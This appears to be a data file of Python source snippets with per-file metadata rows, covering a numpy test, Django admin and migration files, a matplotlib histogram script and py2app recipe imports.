        assert is_close(op.error(o, t), Y_error.flat[k])
def test_4d_ndarray():
    """SquareError must operate elementwise on 4-D arrays, preserving shape and float dtype."""
    C = rand_safe0()  # NOTE(review): return value unused; presumably advances/seeds the RNG — confirm
    op = SquareError(Identity())
    O = rand_safe4(2, 2, 2, 2)
    T = rand_safe4(2, 2, 2, 2)
    Y = op(O, T)
    assert Y.shape == O.shape
    assert Y.dtype == numpy.dtype(float)
    Y_f = op.f(O, T)
    assert Y_f.shape == O.shape
    # BUG FIX: previously asserted Y.dtype instead of Y_f.dtype (copy-paste error)
    assert Y_f.dtype == numpy.dtype(float)
    Y_f_prime = op.f_prime(O, T)
    assert Y_f_prime.shape == O.shape
    # BUG FIX: previously asserted Y.dtype instead of Y_f_prime.dtype
    assert Y_f_prime.dtype == numpy.dtype(float)
    Y_error = op.error(O, T)
    assert Y_error.shape == O.shape
    # BUG FIX: previously asserted Y.dtype instead of Y_error.dtype
    assert Y_error.dtype == numpy.dtype(float)
    # compare against the scalar implementation via the flat iterators
    for k, (o, t) in enumerate(zip(O.flat, T.flat)):
        assert is_close(op(o, t), Y.flat[k])
        assert is_close(op.f(o, t), Y_f.flat[k])
        assert is_close(op.f_prime(o, t), Y_f_prime.flat[k])
        assert is_close(op.error(o, t), Y_error.flat[k])
| 29.164122
| 168
| 0.668368
| 1,419
| 7,641
| 3.481325
| 0.085976
| 0.015385
| 0.060526
| 0.069838
| 0.814372
| 0.804453
| 0.787854
| 0.765182
| 0.733198
| 0.677328
| 0
| 0.03126
| 0.175239
| 7,641
| 261
| 169
| 29.275862
| 0.752618
| 0.11242
| 0
| 0.607955
| 0
| 0
| 0.084037
| 0.007411
| 0
| 0
| 0
| 0
| 0.346591
| 1
| 0.113636
| false
| 0
| 0.028409
| 0.034091
| 0.176136
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
e20a6f76e846aa1b60a87f57df9b45d073789c54
| 155
|
py
|
Python
|
mpst_ts/utils/__init__.py
|
stscript-cgo/STScript
|
d2ab2a05b997e9487fd3057a38dcec67feb20e53
|
[
"Apache-2.0"
] | null | null | null |
mpst_ts/utils/__init__.py
|
stscript-cgo/STScript
|
d2ab2a05b997e9487fd3057a38dcec67feb20e53
|
[
"Apache-2.0"
] | null | null | null |
mpst_ts/utils/__init__.py
|
stscript-cgo/STScript
|
d2ab2a05b997e9487fd3057a38dcec67feb20e53
|
[
"Apache-2.0"
] | null | null | null |
from .template_generator import TemplateGenerator
import mpst_ts.utils.type_declaration as type_declaration
import mpst_ts.utils.role_parser as role_parser
| 51.666667
| 57
| 0.896774
| 23
| 155
| 5.73913
| 0.565217
| 0.151515
| 0.181818
| 0.257576
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.070968
| 155
| 3
| 58
| 51.666667
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
3574fa4e6ecb3a4464717078c8132107123521b4
| 169
|
py
|
Python
|
reservi/src/admin.py
|
reservi/api_server
|
e098e51f13eb5797a7a4b5236410367525a72f46
|
[
"MIT"
] | null | null | null |
reservi/src/admin.py
|
reservi/api_server
|
e098e51f13eb5797a7a4b5236410367525a72f46
|
[
"MIT"
] | null | null | null |
reservi/src/admin.py
|
reservi/api_server
|
e098e51f13eb5797a7a4b5236410367525a72f46
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Country
from .models import Sex
# Register your models here.
# Expose the reference-data models in the Django admin, in the same order
# as the original individual register() calls.
for reference_model in (Country, Sex):
    admin.site.register(reference_model)
| 21.125
| 32
| 0.804734
| 25
| 169
| 5.44
| 0.48
| 0.147059
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118343
| 169
| 8
| 33
| 21.125
| 0.912752
| 0.153846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
35938771c0f42abe1369fd08bb89fc79f875323b
| 49
|
py
|
Python
|
.history/__init___20210908040237.py
|
GraceOswal/NewsRoom
|
591d3559dc313564695ce7fbb0052ebeceea5cc3
|
[
"MIT"
] | null | null | null |
.history/__init___20210908040237.py
|
GraceOswal/NewsRoom
|
591d3559dc313564695ce7fbb0052ebeceea5cc3
|
[
"MIT"
] | null | null | null |
.history/__init___20210908040237.py
|
GraceOswal/NewsRoom
|
591d3559dc313564695ce7fbb0052ebeceea5cc3
|
[
"MIT"
] | null | null | null |
from flask import Flask
#initializing application
| 24.5
| 25
| 0.877551
| 6
| 49
| 7.166667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102041
| 49
| 2
| 25
| 24.5
| 0.977273
| 0.489796
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ea022414e3afdc032cd0c75586eb752bccee6928
| 31
|
py
|
Python
|
conftest.py
|
syscocloud/puppetboard
|
94052a0330b1e73963504a2a2fff9dbab52b2a87
|
[
"Apache-2.0"
] | 352
|
2016-01-04T21:27:26.000Z
|
2022-03-22T14:04:47.000Z
|
conftest.py
|
syscocloud/puppetboard
|
94052a0330b1e73963504a2a2fff9dbab52b2a87
|
[
"Apache-2.0"
] | 465
|
2016-01-06T14:39:56.000Z
|
2022-03-29T18:20:06.000Z
|
conftest.py
|
syscocloud/puppetboard
|
94052a0330b1e73963504a2a2fff9dbab52b2a87
|
[
"Apache-2.0"
] | 208
|
2016-01-08T20:08:37.000Z
|
2022-03-29T14:34:38.000Z
|
import puppetboard
import test
| 10.333333
| 18
| 0.870968
| 4
| 31
| 6.75
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 31
| 2
| 19
| 15.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ea0e964de532634b4e38e0819aade453c3b8171a
| 22
|
py
|
Python
|
src/getkw/__init__.py
|
dagesundholm/DAGE
|
0d0ef1d3e74ba751ca4d288db9f1ac7f9a822138
|
[
"MIT"
] | 3
|
2018-03-29T08:48:57.000Z
|
2020-02-16T22:40:22.000Z
|
src/getkw/__init__.py
|
dagesundholm/DAGE
|
0d0ef1d3e74ba751ca4d288db9f1ac7f9a822138
|
[
"MIT"
] | null | null | null |
src/getkw/__init__.py
|
dagesundholm/DAGE
|
0d0ef1d3e74ba751ca4d288db9f1ac7f9a822138
|
[
"MIT"
] | 1
|
2019-04-08T14:40:57.000Z
|
2019-04-08T14:40:57.000Z
|
from .getkw import *
| 7.333333
| 20
| 0.681818
| 3
| 22
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.227273
| 22
| 2
| 21
| 11
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ea9e3548417dd6947f17c09904986ff8700186d9
| 25
|
py
|
Python
|
dependencies/georeference maps/pythongis/vector/fileformats/thirdparty/stata_dta/__init__.py
|
karimbahgat/AutoMap
|
eae52f16b7ce71cb2b4b7ae67cf6e4680ea2194f
|
[
"MIT"
] | 9
|
2015-03-05T01:47:50.000Z
|
2022-03-21T02:16:42.000Z
|
dependencies/georeference maps/pythongis/vector/fileformats/thirdparty/stata_dta/__init__.py
|
karimbahgat/AutoMap
|
eae52f16b7ce71cb2b4b7ae67cf6e4680ea2194f
|
[
"MIT"
] | 1
|
2021-05-13T06:00:41.000Z
|
2021-05-13T06:00:41.000Z
|
dependencies/georeference maps/pythongis/vector/fileformats/thirdparty/stata_dta/__init__.py
|
karimbahgat/AutoMap
|
eae52f16b7ce71cb2b4b7ae67cf6e4680ea2194f
|
[
"MIT"
] | 8
|
2015-04-01T00:31:02.000Z
|
2021-01-08T04:17:31.000Z
|
from .stata_dta import *
| 12.5
| 24
| 0.76
| 4
| 25
| 4.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 25
| 1
| 25
| 25
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
57ac86cc2c6236f087b743b518df4d52e077f0b4
| 4,081
|
py
|
Python
|
address/migrations/0001_initial.py
|
theonlykingpin/snapfoodclone
|
0c1a7839424e89d9bc7bfb55c150a92055759702
|
[
"MIT"
] | 11
|
2021-09-17T07:44:05.000Z
|
2022-02-06T08:33:30.000Z
|
address/migrations/0001_initial.py
|
theonlykingpin/snapfoodclone
|
0c1a7839424e89d9bc7bfb55c150a92055759702
|
[
"MIT"
] | 1
|
2021-10-09T07:37:14.000Z
|
2021-10-09T07:37:14.000Z
|
address/migrations/0001_initial.py
|
theonlykingpin/snapfoodclone
|
0c1a7839424e89d9bc7bfb55c150a92055759702
|
[
"MIT"
] | 3
|
2021-09-27T14:12:13.000Z
|
2021-10-18T12:21:37.000Z
|
# Generated by Django 3.2 on 2021-08-28 20:31
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the address app.

    Creates the geographic hierarchy State -> City -> Area and the Address
    model; City/Area/Address reference their parents with CASCADE deletes.
    """

    # First migration of this app, so nothing to depend on.
    initial = True

    dependencies = [
    ]

    operations = [
        # Top of the hierarchy: a state has only a name and a slug.
        migrations.CreateModel(
            name='State',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_time', models.DateTimeField(auto_now_add=True, verbose_name='created time')),
                ('modified_time', models.DateTimeField(auto_now=True, verbose_name='modified time')),
                ('name', models.CharField(max_length=20, verbose_name='name')),
                ('slug', models.SlugField(allow_unicode=True, max_length=25, verbose_name='slug')),
            ],
            options={
                'verbose_name': 'State',
                'verbose_name_plural': 'States',
                'db_table': 'state',
            },
        ),
        # A city belongs to exactly one state (deleted with it).
        migrations.CreateModel(
            name='City',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_time', models.DateTimeField(auto_now_add=True, verbose_name='created time')),
                ('modified_time', models.DateTimeField(auto_now=True, verbose_name='modified time')),
                ('name', models.CharField(max_length=20, verbose_name='name')),
                ('slug', models.SlugField(allow_unicode=True, max_length=25, verbose_name='slug')),
                ('state', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cities', to='address.state', verbose_name='state')),
            ],
            options={
                'verbose_name': 'City',
                'verbose_name_plural': 'Cities',
                'db_table': 'city',
            },
        ),
        # An area belongs to exactly one city (deleted with it).
        migrations.CreateModel(
            name='Area',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_time', models.DateTimeField(auto_now_add=True, verbose_name='created time')),
                ('modified_time', models.DateTimeField(auto_now=True, verbose_name='modified time')),
                ('name', models.CharField(max_length=20, verbose_name='name')),
                ('slug', models.SlugField(allow_unicode=True, max_length=25, verbose_name='slug')),
                ('city', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='areas', to='address.city', verbose_name='city')),
            ],
            options={
                'verbose_name': 'Area',
                'verbose_name_plural': 'Areas',
                'db_table': 'area',
            },
        ),
        # Address denormalises all three levels (state, city, area) as FKs.
        migrations.CreateModel(
            name='Address',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_time', models.DateTimeField(auto_now_add=True, verbose_name='created time')),
                ('modified_time', models.DateTimeField(auto_now=True, verbose_name='modified time')),
                ('floor', models.SmallIntegerField(verbose_name='floor')),
                ('plaque', models.SmallIntegerField(verbose_name='plaque')),
                ('area', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='addresses', to='address.area', verbose_name='area')),
                ('city', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='addresses', to='address.city', verbose_name='city')),
                ('state', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='addresses', to='address.state', verbose_name='state')),
            ],
            options={
                'verbose_name': 'Address',
                'verbose_name_plural': 'Addresses',
                'db_table': 'address',
            },
        ),
    ]
| 50.382716
| 158
| 0.584906
| 412
| 4,081
| 5.580097
| 0.162621
| 0.157895
| 0.080035
| 0.093954
| 0.737712
| 0.737712
| 0.717268
| 0.717268
| 0.717268
| 0.679426
| 0
| 0.008734
| 0.270522
| 4,081
| 80
| 159
| 51.0125
| 0.76352
| 0.010537
| 0
| 0.520548
| 1
| 0
| 0.166501
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.027397
| 0
| 0.082192
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
57cc92cf237bd326b7cac7c3eb58835582da6dd7
| 32
|
py
|
Python
|
src/cms_jetnet/processors/__init__.py
|
rkansal47/cms_jetnet
|
2ec587d3dd5c6dca78206018e592366151334e9b
|
[
"MIT"
] | null | null | null |
src/cms_jetnet/processors/__init__.py
|
rkansal47/cms_jetnet
|
2ec587d3dd5c6dca78206018e592366151334e9b
|
[
"MIT"
] | null | null | null |
src/cms_jetnet/processors/__init__.py
|
rkansal47/cms_jetnet
|
2ec587d3dd5c6dca78206018e592366151334e9b
|
[
"MIT"
] | null | null | null |
from .DatasetProcessor import *
| 16
| 31
| 0.8125
| 3
| 32
| 8.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 32
| 1
| 32
| 32
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
17b2e65894405696b37237bb8145401598616815
| 62
|
py
|
Python
|
evolutionary/operators/crossover.py
|
fedepare/evolutionary
|
690ba3f744e2b9b83c9d0945b6e05f76be93788f
|
[
"MIT"
] | 1
|
2020-07-08T11:32:24.000Z
|
2020-07-08T11:32:24.000Z
|
evolutionary/operators/crossover.py
|
fedepare/evolutionary
|
690ba3f744e2b9b83c9d0945b6e05f76be93788f
|
[
"MIT"
] | 1
|
2020-07-28T11:16:57.000Z
|
2020-09-24T17:28:18.000Z
|
evolutionary/operators/crossover.py
|
fedepare/evolutionary
|
690ba3f744e2b9b83c9d0945b6e05f76be93788f
|
[
"MIT"
] | 1
|
2020-07-28T12:02:59.000Z
|
2020-07-28T12:02:59.000Z
|
def crossover_none(mother, father):
    """No-op crossover operator: hand both parents back unchanged."""
    offspring = (mother, father)
    return offspring
| 20.666667
| 35
| 0.758065
| 8
| 62
| 5.75
| 0.75
| 0.521739
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16129
| 62
| 2
| 36
| 31
| 0.884615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
17c3cc1f6ea3270b77093854c512d7f8473b2e7d
| 5,949
|
py
|
Python
|
Modell/CSV/diagramm_tf_genauigkeit.py
|
NoahEmbedded/EmbeddedKWD
|
2380d56b0b75bae4fedeb60885358332766f7319
|
[
"MIT"
] | null | null | null |
Modell/CSV/diagramm_tf_genauigkeit.py
|
NoahEmbedded/EmbeddedKWD
|
2380d56b0b75bae4fedeb60885358332766f7319
|
[
"MIT"
] | null | null | null |
Modell/CSV/diagramm_tf_genauigkeit.py
|
NoahEmbedded/EmbeddedKWD
|
2380d56b0b75bae4fedeb60885358332766f7319
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import numpy as np
#Input = Sprache
#output sprache
spIn_spOut = np.array([100,100,0.61,99.84,99.17,100,98.2,100,100,100,92.67,99.98,100,99.84,100,96.43,99.99,100,99.97,97.62,100,100,92.77,100,99.93,96.97,100,100,100,100,94.32,97.25,88.54,100,78.25,100,100,82.26,100,100,99.99,11.78,77.43,100,100,99.69,100,99.66,99.99,100,100,98.32,2.45,100,4.2,26.09,98.98,96.09,94.92,82.16,100,99.99,100,100,4.92,1.98,100,86.59,97.08,100,99.94,100,100,100,100,100,99.97,11.96,100,85.7,93.36,100,99.95,0.76,100,100,100,100,99.99,100,93.68,100,79.97,100,100,100,99.98,100,99.93,100,50.76,100,100,76.21,99.89,100,100,76.73,17.59,100,66.92,95.29,100,97.4,99.69,99.85,99.99,100,100,1.11,98.35,100,100,99.75,99.98,100,100,100,100,100,100,98.49,100,99.99,12.14,100,100,71.05,100,99.96,100,99.67,99.98,100,99.19,97.06,97.42,86.73,55.24,35.23,100,100,100,100,14.57,100,100,99.89,100,99.87,100,100,100,100,99.99,100,100,100,99.92,70.29,100,100,100,99.98,99.11,100,100,100,99.98,56.94,98.76,92.32,1.88,99.69,99.96,99.74,99.01,96.03,59.72,100,100,0.77,100,100,100,15.04,100,47.34,100,96.9,100,99.68,100,65.52,100,99.03,94.87,100,98.33,99.24,99.9,100,4.81,100,100,95.19,99.51,99.92,1.18,100,100,100,96.91,99.99,4.31,0,92.39,100,98.56,100,100,100,0,100,56.89,100,100,100,100,97.98,4.64,34.55,99.71,99.22,72.04,99.92,97.49,100,100,100,96.51,7.58,99.96,100,99.96,100,0.69,100,99.74,0.66,99.99,100,99.81,100,0.04,100,100,100,99.99,99.54,57.23,99.71,100,99.97,100,99.94,7.01,100,100,100,99.63,100,100,100,98.88,98.31,99.89,100,98.73,99.96,100,99.99,99.82,100,99.99,99.86,99.98,99.54,100,92.38])
#output marvin
spIn_maOut = np.array([0,0,99.39,0.16,0.83,0,1.8,0,0,0,7.33,0.02,0,0.16,0,3.57,0.01,0,0.03,2.38,0,0,7.23,0,0.07,3.03,0,0,0,0,5.68,2.75,11.46,0,21.75,0,0,17.74,0,0,0.01,88.22,22.57,0,0,0.31,0,0.34,0.01,0,0,1.68,97.55,0,95.8,73.91,1.02,3.91,5.08,17.84,0,0.01,0,0,95.08,98.02,0,13.41,2.92,0,0.06,0,0,0,0,0,0.03,88.04,0,14.3,6.64,0,0.05,99.24,0,0,0,0,0.01,0,6.32,0,20.03,0,0,0,0.02,0,0.07,0,49.24,0,0,23.79,0.11,0,0,23.27,82.41,0,33.08,4.71,0,2.6,0.31,0.15,0.01,0,0,98.89,1.65,0,0,0.25,0.02,0,0,0,0,0,0,1.51,0,0.01,87.86,0,0,28.95,0,0.04,0,0.33,0.02,0,0.81,2.94,2.58,13.27,44.76,64.77,0,0,0,0,85.43,0,0,0.11,0,0.13,0,0,0,0,0.01,0,0,0,0.08,29.71,0,0,0,0.02,0.89,0,0,0,0.02,42.68,1.24,7.68,98.12,0.31,0.04,0.26,0.99,3.97,40.28,0,0,99.23,0,0,0,84.96,0,52.66,0,3.1,0,0.32,0,34.48,0,0.97,5.13,0,1.67,0.76,0.1,0,95.19,0,0,4.81,0.49,0.08,0,0,0,0,3.09,0.01,95.69,100,7.61,0,1.44,0,0,0,100,0,43.11,0,0,0,0,2.02,95.36,65.45,0.29,0.78,27.96,0.08,2.51,0,0,0,3.49,92.42,0.04,0,0.04,0,99.31,0,0.26,99.34,0.01,0,0.19,0,99.96,0,0,0,0.01,0.46,42.77,0.29,0,0.03,0,0.06,92.99,0,0,0,0.29,0,0,0,1.12,1.69,0.11,0,1.27,0.04,0,0.01,0.18,0,0.01,0.14,0.02,0.46,0,7.62])
#output
spIn_stOut = np.array([0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0.38,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,98.82,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0.08,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,])
def _histogramm_10er(werte):
    """Bin values from [0, 100] into ten 10-wide buckets.

    Values <= 10 land in bucket 0; otherwise the bucket index is
    ceil(w/10) - 1, i.e. (10, 20] -> 1, ..., (90, 100] -> 9.
    Values above 100 are ignored, matching the original if/elif ladders.
    """
    bins = [0] * 10
    for wert in werte:
        if wert <= 10:
            bins[0] += 1
        elif wert <= 100:
            bins[int(np.ceil(wert / 10.0)) - 1] += 1
    return bins

# CONSISTENCY FIX: the three hand-written 20-line if/elif ladders were exact
# duplicates of each other; computing each distribution through one helper
# removes the triplication without changing any bucket boundary.
verteilungSP = _histogramm_10er(spIn_spOut)  # network output "Sprache" (speech)
verteilungMA = _histogramm_10er(spIn_maOut)  # network output "Marvin Go"
verteilungST = _histogramm_10er(spIn_stOut)  # network output "Stille" (silence)
# Axis labels for the ten 10%-wide histogram buckets.
labels = ["0-10","10-20","20-30","30-40","40-50","50-60","60-70","70-80","80-90","90-100"]
X = np.arange(10)
# One row of three subplots; only the first is populated in this script.
fig,axs = plt.subplots(1,3)
fig.suptitle("Ergebnisverteilung Tensorflow",fontsize="xx-large")
axs[0].set_title("Input = Sprache")
axs[0].set_xlabel("Ergebnis in %",fontsize="large")
axs[0].set_ylabel("Sampleanzahl",fontsize="large")
# Three grouped bars per bucket, offset by 0.25 each so they sit side by side.
axs[0].bar(x = X+0,height = verteilungSP,width=0.25,color = "b",label = "Output = Sprache")
axs[0].bar(x = X+0.25,height = verteilungMA,width=0.25,color = "g",label = "Output = Marvin Go")
axs[0].bar(x = X+0.5,height = verteilungST,width=0.25,color = "r",label = "Output = Stille")
axs[0].legend()
axs[0].yaxis.grid(True,linestyle = "--")
# Center the tick labels under the middle bar of each group.
axs[0].set_xticks(X+0.25)
axs[0].set_xticklabels(labels)
plt.show()
| 63.287234
| 1,510
| 0.598588
| 1,671
| 5,949
| 2.122681
| 0.104129
| 0.22216
| 0.282492
| 0.346208
| 0.304483
| 0.254299
| 0.214548
| 0.199323
| 0.084297
| 0.084297
| 0
| 0.429634
| 0.118507
| 5,949
| 94
| 1,511
| 63.287234
| 0.246758
| 0.016978
| 0
| 0.348837
| 0
| 0
| 0.032694
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.023256
| 0
| 0.023256
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
aa3291961d339bf3f36ba9930ba1afc2e04fd818
| 130
|
py
|
Python
|
src/mbed_cloud/update/__init__.py
|
GQMai/mbed-cloud-sdk-python
|
76ef009903415f37f69dcc5778be8f5fb14c08fe
|
[
"Apache-2.0"
] | 12
|
2017-12-28T11:18:43.000Z
|
2020-10-04T12:11:15.000Z
|
src/mbed_cloud/update/__init__.py
|
GQMai/mbed-cloud-sdk-python
|
76ef009903415f37f69dcc5778be8f5fb14c08fe
|
[
"Apache-2.0"
] | 50
|
2017-12-21T12:50:41.000Z
|
2020-01-13T16:07:08.000Z
|
src/mbed_cloud/update/__init__.py
|
GQMai/mbed-cloud-sdk-python
|
76ef009903415f37f69dcc5778be8f5fb14c08fe
|
[
"Apache-2.0"
] | 8
|
2018-04-25T17:47:29.000Z
|
2019-08-29T06:38:27.000Z
|
from .update import Campaign
from .update import FirmwareImage
from .update import FirmwareManifest
from .update import UpdateAPI
| 26
| 36
| 0.846154
| 16
| 130
| 6.875
| 0.4375
| 0.363636
| 0.581818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123077
| 130
| 4
| 37
| 32.5
| 0.964912
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
aa3903c4887534a8e602fdb06f758f0789beefcd
| 863
|
py
|
Python
|
venv/lib/python3.9/site-packages/py2app/recipes/__init__.py
|
dequeb/asmbattle
|
27e8b209de5787836e288a2f2f9b7644ce07563e
|
[
"MIT"
] | null | null | null |
venv/lib/python3.9/site-packages/py2app/recipes/__init__.py
|
dequeb/asmbattle
|
27e8b209de5787836e288a2f2f9b7644ce07563e
|
[
"MIT"
] | null | null | null |
venv/lib/python3.9/site-packages/py2app/recipes/__init__.py
|
dequeb/asmbattle
|
27e8b209de5787836e288a2f2f9b7644ce07563e
|
[
"MIT"
] | null | null | null |
from . import PIL # noqa: F401
from . import automissing # noqa: F401
from . import autopackages # noqa: F401
from . import ctypes # noqa: F401
from . import docutils # noqa: F401
from . import ftplib # noqa: F401
from . import lxml # noqa: F401
from . import matplotlib # noqa: F401
from . import pydoc # noqa: F401
from . import pyenchant # noqa: F401
from . import pygame # noqa: F401
from . import pyopengl # noqa: F401
from . import pyside # noqa: F401
from . import pyside2 # noqa: F401
from . import qt5 # noqa: F401
from . import setuptools # noqa: F401
from . import shiboken2 # noqa: F401
from . import sip # noqa: F401
from . import six # noqa: F401
from . import sysconfig_module # noqa: F401
from . import tkinter # noqa: F401
from . import virtualenv # noqa: F401
from . import wx # noqa: F401
from . import xml # noqa: F401
